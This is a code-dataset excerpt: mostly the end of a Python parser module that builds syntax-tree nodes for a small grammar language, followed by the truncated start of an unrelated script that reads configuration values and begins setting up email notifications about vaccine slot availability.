inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Block, *body)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Block(*body)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_defmacro(cls, context, loc, name, params, body):\n \"\"\"\n \"\"\"\n\n if not context.actions.inmacro:\n raise GlapSyntaxError(context,\n ie_(\"Macro body is outside `defmacro'\"), loc\n )\n if context.actions.procedure_nesting_level != 0:\n raise GlapSyntaxError(context,\n ie_(\"Macro body is inside function\"), loc\n )\n for node in body:\n cls.checknode(context, loc, node)\n o = cls(context, loc, \"\")\n o.kind = cls.DEFMACRO_STATEMENT\n mbody = []\n for node in body:\n mbody.extend(node.code)\n if node.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n mbody.append(node.value_expr())\n o.node = DefMacro(name.value(), [p.value() for p in params], mbody)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.inmacro = False\n return o\n #-def\n\n @classmethod\n def make_define(cls, context, loc, name, params, has_varargs, body):\n \"\"\"\n \"\"\"\n\n if context.actions.inmacro:\n raise GlapSyntaxError(context,\n ie_(\"Function definition is inside macro\"), loc\n )\n if context.actions.procedure_nesting_level <= 0:\n raise GlapSyntaxError(context,\n ie_(\"Unballanced `define's\"), loc\n )\n cls.checknode(context, loc, body)\n params_ = [p.value() for p in params]\n bvars_ = [v for v in body.vars if v not in params_]\n body_ = body.value_expr().commands\n o = cls(context, loc, \"\")\n o.kind = cls.DEFINE_STATEMENT\n o.node = Define(name.value(), bvars_, params_, has_varargs, body_)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.procedure_nesting_level -= 1\n return o\n #-def\n\n @classmethod\n def make_if(cls, context, loc, cond, then_part, elif_parts, else_part):\n \"\"\"\n \"\"\"\n\n inmacro = context.actions.inmacro\n if_then_parts = [(loc, cond, then_part)]\n if_then_parts.extend(elif_parts)\n node = None\n vars = []\n while if_then_parts:\n l, c, t = if_then_parts.pop()\n if node is None:\n node = []\n if else_part:\n ll, else_node = else_part[0]\n cls.checknode(context, ll, else_node)\n if inmacro:\n node.extend(else_node.value_expr().nodes)\n else:\n node.extend(else_node.value_expr().commands)\n vars.extend(else_node.vars)\n # `node' is either [] or [commands] or [macro nodes]\n cls.checknode(context, l, c)\n cls.checknode(context, l, t)\n if inmacro:\n node = c.code + [MacroNode(\n If,\n c.value_expr(),\n MacroNodeSequence(*t.value_expr().nodes),\n MacroNodeSequence(*node)\n )]\n node[-1].deferred.append(SetLocation(*make_location(\n context, l\n )))\n else:\n node = c.code + [If(\n c.value_expr(),\n t.value_expr().commands,\n node\n )]\n node[-1].set_location(*make_location(context, l))\n vars_ = []\n vars_.extend(c.vars)\n vars_.extend(t.vars)\n vars_.extend(vars)\n vars = vars_\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n else:\n o.kind = cls.STATEMENT\n o.node = node[-1]\n o.code = node[:-1]\n o.vars = vars\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_foreach(cls, context, loc, var, ie, body):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, ie)\n cls.checknode(context, loc, body)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n Foreach,\n MacroNodeAtom(var.value()),\n ie.value_expr(),\n MacroNodeSequence(*body.value_expr().nodes)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Foreach(\n var.value(), ie.value_expr(), body.value_expr().commands\n )\n o.node.set_location(*make_location(context, loc))\n o.code.extend(ie.code)\n o.vars.append(var.value())\n o.vars.extend(ie.vars)\n o.vars.extend(body.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_while(cls, context, loc, cond, body):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, cond)\n if cond.code:\n raise GlapSyntaxError(\n context,\n ie_(\"More then one commands in while-condition expression\"),\n loc\n )\n cls.checknode(context, loc, body)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n While,\n cond.value_expr(),\n MacroNodeSequence(*body.value_expr().nodes)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = While(\n cond.value_expr(), body.value_expr().commands\n )\n o.node.set_location(*make_location(context, loc))\n o.vars.extend(cond.vars)\n o.vars.extend(body.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_dowhile(cls, context, loc, body, cond):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, body)\n cls.checknode(context, loc, cond)\n if cond.code:\n raise GlapSyntaxError(\n context,\n ie_(\"More then one commands in while-condition expression\"),\n loc\n )\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n DoWhile,\n MacroNodeSequence(*body.value_expr().nodes),\n cond.value_expr()\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = DoWhile(\n body.value_expr().commands, cond.value_expr()\n )\n o.node.set_location(*make_location(context, loc))\n o.vars.extend(body.vars)\n o.vars.extend(cond.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_break(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Break)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Break()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_continue(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Continue)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Continue()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_return(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Return)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Return()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_return_with_value(cls, context, loc, rv):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, rv)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Return, rv.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Return(rv.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(rv.code)\n o.vars.extend(rv.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_try(cls, context, loc, tryblock, catches, fnly):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, tryblock)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n b = tryblock.value_expr().nodes\n o.vars.extend(tryblock.vars)\n c = []\n for ll, ee, ev, hh in catches:\n cls.checknode(context, ll, hh)\n if ev:\n ev = ev.value()\n o.vars.append(ev)\n c.append(MacroNodeSequence(\n MacroNodeAtom(ee.value()),\n MacroNodeAtom(ev),\n MacroNodeSequence(*hh.value_expr().nodes)\n ))\n o.vars.extend(hh.vars)\n f = []\n if fnly:\n ll, ff = fnly[0]\n cls.checknode(context, ll, ff)\n f.extend(ff.value_expr().nodes)\n o.vars.extend(ff.vars)\n o.node = MacroNode(\n TryCatchFinally,\n MacroNodeSequence(*b),\n MacroNodeSequence(*c),\n MacroNodeSequence(*f)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n b = tryblock.value_expr().commands\n o.vars.extend(tryblock.vars)\n c = []\n for ll, ee, ev, hh in catches:\n cls.checknode(context, ll, hh)\n if ev:\n ev = ev.value()\n o.vars.append(ev)\n c.append((ee.value(), ev, hh.value_expr().commands))\n o.vars.extend(hh.vars)\n f = []\n if fnly:\n ll, ff = fnly[0]\n cls.checknode(context, ll, ff)\n f.extend(ff.value_expr().commands)\n o.vars.extend(ff.vars)\n o.node = TryCatchFinally(b, c, f)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_throw(cls, context, loc, ee, em):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, ee)\n if em:\n cls.checknode(context, loc, em)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n if em:\n o.node = MacroNode(Throw, ee.value_expr(), em.value_expr())\n else:\n o.node = MacroNode(Rethrow, ee.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n if em:\n o.node = Throw(ee.value_expr(), em.value_expr())\n else:\n o.node = Rethrow(ee.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(ee.code)\n o.vars.extend(ee.vars)\n if em:\n o.code.extend(em.code)\n o.vars.extend(em.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n#-class\n\nclass GlapParserActions(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'context', 'inmacro', 'procedure_nesting_level', 'actions' ]\n\n def __init__(self, context):\n \"\"\"\n \"\"\"\n\n context.actions = self\n self.context = context\n self.inmacro = False\n self.procedure_nesting_level = 0\n self.actions = {\n 'start': self.on_start,\n 'module': self.on_module,\n 'grammar': self.on_grammar,\n 'rule': self.on_rule,\n 'rule_rhs_expr(_|_)': self.on_rule_rhs_expr_alt,\n 'rule_rhs_expr(_-_)': self.on_rule_rhs_expr_sub,\n 'rule_rhs_expr(_ _)': self.on_rule_rhs_expr_cat,\n 'rule_rhs_expr(_*)': self.on_rule_rhs_expr_star,\n 'rule_rhs_expr(_+)': self.on_rule_rhs_expr_plus,\n 'rule_rhs_expr(_?)': self.on_rule_rhs_expr_opt,\n 'rule_rhs_expr(-_)': self.on_rule_rhs_expr_neg,\n 'rule_rhs_expr(~_)': self.on_rule_rhs_expr_inv,\n 'rule_rhs_expr(_\\'_)': self.on_rule_rhs_expr_label,\n 'rule_rhs_expr_atom(ID)': self.on_rule_rhs_expr_atom_var,\n 'rule_rhs_expr_atom(STR)': self.on_rule_rhs_expr_atom_str,\n 'rule_rhs_expr_atom(STR..STR)': self.on_rule_rhs_expr_atom_range,\n 'rule_rhs_expr_atom(eps)': self.on_rule_rhs_expr_atom_epsilon,\n 'rule_rhs_expr_atom(action)': self.on_rule_rhs_expr_atom_action,\n 'c_expr(_=_)': (lambda *args:\n GlapCompileCmdHelper.make_assign(*args)\n ),\n 'c_expr(_+=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Add)\n ),\n 'c_expr(_-=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Sub)\n ),\n 'c_expr(_*=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Mul)\n ),\n 'c_expr(_/=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Div)\n ),\n 'c_expr(_%=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Mod)\n ),\n 'c_expr(_&=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitAnd)\n ),\n 'c_expr(_|=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitOr)\n ),\n 'c_expr(_^=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitXor)\n ),\n 'c_expr(_<<=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, ShiftL)\n ),\n 'c_expr(_>>=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, ShiftR)\n ),\n 'c_expr(_&&=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, And)\n ),\n 'c_expr(_||=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Or)\n ),\n 'c_expr(_.=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Concat)\n ),\n 'c_expr(_++=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Join)\n ),\n 'c_expr(_~~=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Merge)\n ),\n 'c_expr(_||_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Or)\n ),\n 'c_expr(_&&_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, And)\n ),\n 'c_expr(_<_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Lt)\n ),\n 'c_expr(_>_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Gt)\n ),\n 'c_expr(_<=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Le)\n ),\n 'c_expr(_>=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Ge)\n ),\n 'c_expr(_==_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Eq)\n ),\n 'c_expr(_!=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Ne)\n ),\n 'c_expr(_===_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Is)\n ),\n 'c_expr(_in_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Contains)\n ),\n 'c_expr(_|_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitOr)\n ),\n 'c_expr(_&_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitAnd)\n ),\n 'c_expr(_^_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitXor)\n ),\n 'c_expr(_<<_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, ShiftL)\n ),\n 'c_expr(_>>_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, ShiftR)\n ),\n 'c_expr(_+_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Add)\n ),\n 'c_expr(_-_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Sub)\n ),\n 'c_expr(_._)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Concat)\n ),\n 'c_expr(_++_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Join)\n ),\n 'c_expr(_~~_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Merge)\n ),\n 'c_expr(_*_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Mul)\n ),\n 'c_expr(_/_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Div)\n ),\n 'c_expr(_%_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Mod)\n ),\n 'c_expr(_ _)': (lambda *args:\n GlapCompileCmdHelper.make_call(*args)\n ),\n 'c_expr(-_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Neg)\n ),\n 'c_expr(!_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Not)\n ),\n 'c_expr(~_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Inv)\n ),\n 'c_expr(_[_])': (lambda *args:\n GlapCompileCmdHelper.make_index(*args)\n ),\n 'c_expr(_:ID)': (lambda *args:\n GlapCompileCmdHelper.make_access(*args)\n ),\n 'c_expr_atom(ID)': (lambda *args:\n GlapCompileCmdHelper.make_variable(*args)\n ),\n 'c_expr_atom($ID)': (lambda *args:\n GlapCompileCmdHelper.make_getvalue(*args)\n ),\n 'c_expr_atom(#ID)': (lambda *args:\n GlapCompileCmdHelper.make_macroparam(*args)\n ),\n 'c_expr_atom($(_ _))': (lambda *args:\n GlapCompileCmdHelper.make_expand(*args)\n ),\n 'c_expr_atom(INT)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(FLOAT)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(STR)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(pair)': (lambda *args:\n GlapCompileCmdHelper.make_pair(*args)\n ),\n 'c_expr_atom(list)': (lambda *args:\n GlapCompileCmdHelper.make_list(*args)\n ),\n 'c_expr_atom(hash)': (lambda *args:\n GlapCompileCmdHelper.make_hash(*args)\n ),\n 'c_expr_atom(lambda)': (lambda *args:\n GlapCompileCmdHelper.make_lambda(*args)\n ),\n 'c_stmt(block)': (lambda *args:\n GlapCompileCmdHelper.make_block(*args)\n ),\n 'c_stmt(defmacro)': (lambda *args:\n GlapCompileCmdHelper.make_defmacro(*args)\n ),\n 'c_stmt(define)': (lambda *args:\n GlapCompileCmdHelper.make_define(*args)\n ),\n 'c_stmt(if)': (lambda *args:\n GlapCompileCmdHelper.make_if(*args)\n ),\n 'c_stmt(foreach)': (lambda *args:\n GlapCompileCmdHelper.make_foreach(*args)\n ),\n 'c_stmt(while)': (lambda *args:\n GlapCompileCmdHelper.make_while(*args)\n ),\n 'c_stmt(do-while)': (lambda *args:\n GlapCompileCmdHelper.make_dowhile(*args)\n ),\n 'c_stmt(break)': (lambda *args:\n GlapCompileCmdHelper.make_break(*args)\n ),\n 'c_stmt(continue)': (lambda *args:\n GlapCompileCmdHelper.make_continue(*args)\n ),\n 'c_stmt(return)': (lambda *args:\n GlapCompileCmdHelper.make_return(*args)\n ),\n 'c_stmt(return(expr))': (lambda *args:\n GlapCompileCmdHelper.make_return_with_value(*args)\n ),\n 'c_stmt(try)': (lambda *args:\n GlapCompileCmdHelper.make_try(*args)\n ),\n 'c_stmt(throw)': (lambda *args:\n GlapCompileCmdHelper.make_throw(*args)\n ),\n 'a_stmt(block)': (lambda *args: mn_(ABlock, *args)),\n 'a_stmt(expr)': (lambda ctx, loc, e: e),\n 'a_stmt(_=_)': (lambda *args: mn_(AAssign, *args)),\n 'a_stmt(_+=_)': (lambda *args: mn_(AInplaceAdd, *args)),\n 'a_stmt(_-=_)': (lambda *args: mn_(AInplaceSub, *args)),\n 'a_stmt(_*=_)': (lambda *args: mn_(AInplaceMul, *args)),\n 'a_stmt(_/=_)': (lambda *args: mn_(AInplaceDiv, *args)),\n 'a_stmt(_%=_)': (lambda *args: mn_(AInplaceMod, *args)),\n 'a_stmt(_&=_)': (lambda *args: mn_(AInplaceBitAnd, *args)),\n 'a_stmt(_|=_)': (lambda *args: mn_(AInplaceBitOr, *args)),\n 'a_stmt(_^=_)': (lambda *args: mn_(AInplaceBitXor, *args)),\n 'a_stmt(_<<=_)': (lambda *args: mn_(AInplaceShiftLeft, *args)),\n 'a_stmt(_>>=_)': (lambda *args: mn_(AInplaceShiftRight, *args)),\n 'a_stmt(if)': (lambda *args: mn_(AIf, *args)),\n 'a_stmt(case)': (lambda *args: mn_(ACase, *args)),\n 'a_stmt(for)': (lambda ctx, loc, v, e, b:\n AFor(\n AId(v.value()).set_location(\n *make_location(ctx, v.position())\n ),\n e, b\n ).set_location(*make_location(ctx, loc))\n ),\n 'a_stmt(while)': (lambda *args: mn_(AWhile, *args)),\n 'a_stmt(do-while)': (lambda *args: mn_(ADoWhile, *args)),\n 'a_stmt(break)': (lambda *args: mn_(ABreak, *args)),\n 'a_stmt(continue)': (lambda *args: mn_(AContinue, *args)),\n 'a_stmt(return)': (lambda *args: mn_(AReturn, *args)),\n 'a_stmt(return(expr))': (lambda *args: mn_(AReturnWithValue, *args)),\n 'a_expr(_||_)': (lambda *args: mn_(ALogOrExpr, *args)),\n 'a_expr(_&&_)': (lambda *args: mn_(ALogAndExpr, *args)),\n 'a_expr(_<_)': (lambda *args: mn_(ALtExpr, *args)),\n 'a_expr(_>_)': (lambda *args: mn_(AGtExpr, *args)),\n 'a_expr(_<=_)': (lambda *args: mn_(ALeExpr, *args)),\n 'a_expr(_>=_)': (lambda *args: mn_(AGeExpr, *args)),\n 'a_expr(_==_)': (lambda *args: mn_(AEqExpr, *args)),\n 'a_expr(_!=_)': (lambda *args: mn_(ANotEqExpr, *args)),\n 'a_expr(_|_)': (lambda *args: mn_(ABitOrExpr, *args)),\n 'a_expr(_&_)': (lambda *args: mn_(ABitAndExpr, *args)),\n 'a_expr(_^_)': (lambda *args: mn_(ABitXorExpr, *args)),\n 'a_expr(_<<_)': (lambda *args: mn_(AShiftLeftExpr, *args)),\n 'a_expr(_>>_)': (lambda *args: mn_(AShiftRightExpr, *args)),\n 'a_expr(_+_)': (lambda *args: mn_(AAddExpr, *args)),\n 'a_expr(_-_)': (lambda *args: mn_(ASubExpr, *args)),\n 'a_expr(_*_)': (lambda *args: mn_(AMulExpr, *args)),\n 'a_expr(_/_)': (lambda *args: mn_(ADivExpr, *args)),\n 'a_expr(_%_)': (lambda *args: mn_(AModExpr, *args)),\n 'a_expr(-_)': (lambda *args: mn_(ANegExpr, *args)),\n 'a_expr(~_)': (lambda *args: mn_(AInvExpr, *args)),\n 'a_expr(!_)': (lambda *args: mn_(ANotExpr, *args)),\n 'a_expr(_(_))': (lambda *args: mn_(ACallExpr, *args)),\n 'a_expr(_[_])': (lambda *args: mn_(AIndexExpr, *args)),\n 'a_expr(_.ID)': (lambda ctx, loc, lhs, rhs:\n AAccessExpr(\n lhs,\n AId(rhs.value()).set_location(\n *make_location(ctx, rhs.position())\n )\n ).set_location(*make_location(ctx, loc))\n ),\n 'a_expr_atom(ID)': (lambda *args: mn_(AId, *args)),\n 'a_expr_atom(INT)': (lambda *args: mn_(AIntLiteral, *args)),\n 'a_expr_atom(FLOAT)': (lambda *args: mn_(AFloatLiteral, *args)),\n 'a_expr_atom(STR)': (lambda *args: mn_(AStringLiteral, *args)),\n 'unwrap': self.on_unwrap\n }\n #-def\n\n def on_start(self, context, module):\n \"\"\"\n \"\"\"\n\n return module\n #-def\n\n def on_module(self, context, loc, name, module_units):\n \"\"\"\n \"\"\"\n\n node = DefModule(name.value(), module_units)\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_grammar(\n self, context, loc, name, grammar_type_spec, rules_and_commands\n ):\n \"\"\"\n \"\"\"\n\n node = DefGrammar(\n name.value(),\n [\n (x.value(), Location(*make_location(context, x.position())))\n for x in grammar_type_spec\n ],\n rules_and_commands\n )\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule(self, context, lhs, leftarrow, rhs):\n \"\"\"\n \"\"\"\n\n node = DefRule(lhs.value(), rhs, leftarrow.value() == \":\")\n node.set_location(*make_location(context, lhs.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_alt(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs | rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_sub(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = SetMinus(lhs, rhs)\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_cat(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs + rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_star(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['*']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_plus(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['+']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_opt(self, context, loc, lhs):\n \"\"\"\n \"\"\"\n\n node = lhs['?']\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_neg(self, context, loc, rhs):\n \"\"\"\n \"\"\"\n\n node = -rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_inv(self, context, loc, rhs):\n \"\"\"\n \"\"\"\n\n node = ~rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_label(self, context, loc, lhs, rhs):\n \"\"\"\n \"\"\"\n\n node = lhs % rhs\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_var(self, context, t):\n \"\"\"\n \"\"\"\n\n node = Var(t.value())\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_str(self, context, t):\n \"\"\"\n \"\"\"\n\n v = t.value(True)\n if v == \"\":\n node = Epsilon()\n elif len(v) == 1:\n node = Sym(v)\n else:\n node = Literal(v)\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_range(self, context, t, u):\n \"\"\"\n \"\"\"\n\n if len(t.value()) != 1:\n raise GlapSyntaxError(context,\n \"Character was expected\", t.position()\n )\n if len(u.value()) != 1:\n raise GlapSyntaxError(context,\n \"Character was expected\", u.position()\n )\n if ord(t.value()) > ord(u.value()):\n raise GlapSyntaxError(context,\n \"Invalid range literal (%r > %r)\" % (t.value(), u.value()),\n t.position()\n )\n a = Sym(t.value())\n a.set_location(*make_location(context, t.position()))\n b = Sym(u.value())\n b.set_location(*make_location(context, u.position()))\n node = Range(a, b)\n node.set_location(*make_location(context, t.position()))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_epsilon(self, context, loc):\n \"\"\"\n \"\"\"\n\n node = Epsilon()\n node.set_location(*make_location(context, loc))\n return node\n #-def\n\n def on_rule_rhs_expr_atom_action(self, context, loc, actions):\n \"\"\"\n \"\"\"\n\n l = make_location(context, loc)\n action = ABlock(actions)\n action.set_location(*l)\n node = Action(action)\n node.set_location(*l)\n return node\n #-def\n\n def on_unwrap(self, context, command):\n \"\"\"\n \"\"\"\n\n if self.inmacro:\n raise GlapSyntaxError(context, ie_(\"Unfinished macro definition\"))\n elif self.procedure_nesting_level != 0:\n raise GlapSyntaxError(\n context, ie_(\"Unfinished function definition\")\n )\n kind = command.kind\n if kind < 0:\n raise GlapSyntaxError(context, ie_(\"Unspecified node\"))\n elif kind <= GlapCompileCmdHelper.VARIABLE:\n unwrapped = []\n unwrapped.extend(command.code)\n if kind != GlapCompileCmdHelper.ASSIGN_EXPR:\n unwrapped.append(command.value_expr())\n return unwrapped\n elif kind <= GlapCompileCmdHelper.DEFINE_STATEMENT:\n return [command.value_expr()]\n raise GlapSyntaxError(context,\n ie_(\"Macro nodes was detected outside macro definition scope\")\n )\n #-def\n\n def run(self, action, context, *args):\n \"\"\"\n \"\"\"\n\n if action not in self.actions:\n raise ParsingError(\"Action %r does not exist\" % action)\n return self.actions[action](context, *args)\n #-def\n#-class\n\nclass GlapReader(Reader):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def read(self, source, *args, **opts):\n \"\"\"\n \"\"\"\n\n data, name = self.load_source(source, **opts)\n if data is None:\n return None\n ctx = GlapContext()\n GlapStream(ctx, name, data)\n GlapLexer(ctx)\n GlapParser(ctx)\n GlapActions(ctx)\n #-def\n#-class\n\ndef get_reader_class():\n \"\"\"\n \"\"\"\n\n return GlapReader\n#-def\n","repo_name":"i386x/doit","sub_path":"doit/text/pgen/readers/glap/bootstrap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":61796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28972148675","text":"import config\r\nimport time\r\nimport requests\r\nfrom datetime import date, timedelta\r\nimport smtplib\r\n\r\nuname = config.uname\r\nemail = config.email\r\ndistrict_id = str(config.district_id)\r\nvaccine_type = config.vaccine_type\r\nfee_type =config.fee_type\r\nage_limit = config.age_limit\r\nif age_limit < 45:\r\n age_limit = 18\r\nelse:\r\n age_limit = 45\r\n\r\nisUserNotified = config.isUserNotified\r\ndate_api = []\r\npayload = []\r\navailable_flag_break = config.available_flag_break\r\nattempt = config.attempt\r\nwait_time = config.wait_time\r\n\r\ndef sendmail(payload, email):\r\n def smtp(email, body):\r\n print(\"Sending mail to \" + email)\r\n SMTP_USER_NAME = config.SMTP_USER_NAME\r\n SMTP_PASSWORD = config.SMTP_PASSWORD\r\n SMTP_SERVER = config.SMTP_SERVER\r\n SMTP_PORT = config.SMTP_PORT\r\n TO = email\r\n 